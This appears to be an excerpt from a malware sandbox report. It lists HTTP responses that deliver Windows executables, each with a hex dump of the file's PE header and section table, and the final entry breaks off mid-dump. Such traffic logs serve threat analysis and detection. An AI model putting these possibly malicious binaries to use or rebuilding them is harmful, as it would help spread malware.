00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 07:08:23 GMTContent-Type: application/octet-streamContent-Length: 1784320Last-Modified: Mon, 09 Dec 2024 06:21:21 GMTConnection: keep-aliveETag: "67568c61-1b3a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 a0 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 68 00 00 04 00 00 48 a9 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 64 61 71 6f 70 69 00 a0 19 00 00 f0 4e 00 00 96 19 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 70 6a 66 66 6c 65 76 00 10 00 00 00 90 68 00 00 04 00 00 00 14 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 68 00 00 22 00 00 00 18 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 07:08:31 GMTContent-Type: application/octet-streamContent-Length: 970752Last-Modified: Mon, 09 Dec 2024 06:19:27 GMTConnection: keep-aliveETag: "67568bef-ed000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e7 8b 56 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 20 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 f9 4a 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 50 65 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 65 01 00 00 40 0d 00 00 66 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 5a 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 07:08:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 07:08:38 GMTContent-Type: application/octet-streamContent-Length: 2724864Last-Modified: Mon, 09 Dec 2024 06:19:53 GMTConnection: keep-aliveETag: "67568c09-299400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 c4 3e 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 71 75 61 61 61 70 75 6b 00 40 29 00 00 a0 00 00 00 32 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 67 74 76 69 70 74 76 00 20 00 00 00 e0 29 00 00 06 00 00 00 6c 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2a 00 00 22 00 00 00 72 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 07:08:50 GMTContent-Type: application/octet-streamContent-Length: 2724864Last-Modified: Mon, 09 Dec 2024 06:19:55 GMTConnection: keep-aliveETag: "67568c0b-299400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 c4 3e 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 71 75 61 61 61 70 75 6b 00 40 29 00 00 a0 00 00 00 32 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 67 74 76 69 70 74 76 00 20 00 00 00 e0 29 00 00 06 00 00 00 6c 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2a 00 00 22 00 00 00 72 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 07:08:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 07:08:56 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 07:08:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 